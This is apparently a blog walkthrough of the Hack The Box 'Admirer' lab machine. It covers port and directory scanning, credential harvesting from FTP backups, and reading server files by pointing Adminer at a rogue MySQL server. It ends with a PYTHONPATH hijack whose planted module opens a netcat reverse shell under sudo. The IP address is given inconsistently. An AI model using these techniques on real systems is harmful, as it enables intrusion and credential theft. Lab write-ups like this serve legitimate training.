12. Hack The Box. Level Medium: Admirer walkthrough. Admirer and RCE vulnerability due to environment swapping

13 December 2024 5 minutes Author: Lady Liberty

Looking for a detailed walkthrough of the Admirer machine on Hack The Box? In this article, we take a step-by-step look at the process of identifying and exploiting vulnerabilities to achieve remote code execution (RCE). Hack The Box is a popular cybersecurity training and practice platform. The Admirer machine offers a complex challenge that requires the researcher to have the skills to gather information, analyze data, and exploit vulnerabilities.

Step-by-step guide

The publication of solutions submitted for the modification of machines from the HackTheBox platform continues. The hosts contain important data, which is accessed on a private network together with experienced specialists in the field of information security.

Recon

This machine has an IP address of 10.10.10.189, which we add to /etc/hosts.

10.10.10.187 	admirer.htb

First, a scan of open ports is performed. To speed up the process, instead of using nmap to scan all ports, the scan is performed using masscan. All TCP and UDP ports are analyzed via the tun0 interface at a rate of 500 packets per second.

masscan -e tun0 -p1-65535,U:1-65535 10.10.10.187 --rate=500

Now, to get more detailed information about the services running on the ports, let’s run the scan with the -A option.

nmap -A admirer.htb -p80,22,21

Based on the results of the nmap scan, a further course of action is determined. FTP and SSH services that require credentials are detected on the server, as well as an Apache web server. The robots.txt file is available on the web server, which contains a single entry — the admin-dir directory. Due to the lack of additional information, the next step is to scan the directories.

For this purpose, a quick tool called gobuster is used. The parameters specify:

  • scan type — directories (dir);

  • site URL (-u);

  • dictionary to scan (-w);

  • required file extensions (-x);

  • number of threads (-t).

gobuster dir -t 128 -u http://admirer.htb/admin-dir/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php,txt

We find two files: the first contains email addresses, and the second contains various credentials.

And among the credentials we find credits for FTP. We connect:

Consider the server.

We are downloading all the files.

There is a suspicion that this archive is a backup of the site, let’s unzip it and see what’s in it.

mkdir HTML
mv html.tar.gz HTML/ 
cd HTML
tar -xf html.tar.gz

The first file is no different from the existing one, but among the credentials there are some that we don’t have.

Attempts to use them do not yield results. You need to search for the user and pass strings in all downloaded files.

grep -R -i "user\|pass" ./

Two more passwords for the same user were discovered. All available credentials were collected.

But they didn’t get anywhere.

Entry Point

When trying to complete tasks that are not resolved on the site, we will receive a refusal.

Since all executable files are located in the utility-scripts directory, let’s scan it on the host, looking for php files.

gobuster dir -t 128 -u http://admirer.htb/utility-scripts/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -x php

We find the file admirer.php.

After searching for information, the following sources made it clear how to get an RCE. If you specify your host as the server, you can see a connection attempt.

Start the mysql service on the local host.

sudo service mysql start
sudo mysql -u root

And let’s create a user for authorization.

create user ralfadmirer@'%' identified by 'ralfadmirer'
create database admirerdb;
grant all privileges on admirerdb.* to 'ralfadmirer';

The configuration file /etc/mysql/mariadb.conf.d/50-server.cnf is modified to allow access to the host. To do this, the bind-address line is commented out, after which the service is restarted.

sudo service mysql restart

We log in on behalf of the newly created user.

USER

We select our database.

Next, let’s create a table.

And we will execute an SQL query to read the index.php file, where we can find the credentials (as it was in the backup).

load data local infile '../index.php'
into table admirerdb.admirertable
fields terminated by '\n'

Now let’s move on to our created table.

And we will find the credentials.

SSH authentication was successfully completed using this password.

ROOT

Check the sudo settings.

Thus, this script can be executed as a superuser. During its analysis, a call to a Python script was detected, which is also executed with sudo privileges.

And the script itself specifies an implicit import.

Environment variables are checked, including paths to Python.

This way, you can create a file with the same name that contains the same function but does different things. By changing the environment variable, you run the program, which causes the created file to execute.
def make_archive():
        import os
        os.system('nc 10.10.15.110 4321 -e "/bin/sh"')

make_archive()

Let’s run the script.

sudo PYTHONPATH='/tmp/' /opt/scripts/admin_tasks.sh

We get a backconnect shell.

Full control over this machine has been gained.

Conclusion

The article describes in detail the process of exploiting vulnerabilities on the Hack The Box Admirer machine. Using a sequential approach — from port scanning and searching for hidden directories to script analysis and manipulation of environment variables — it was possible to gain complete control over the system. This experience demonstrates the importance of careful study of configurations and working with access rights in the field of cybersecurity.

Other related articles
Found an error?
If you find an error, take a screenshot and send it to the bot.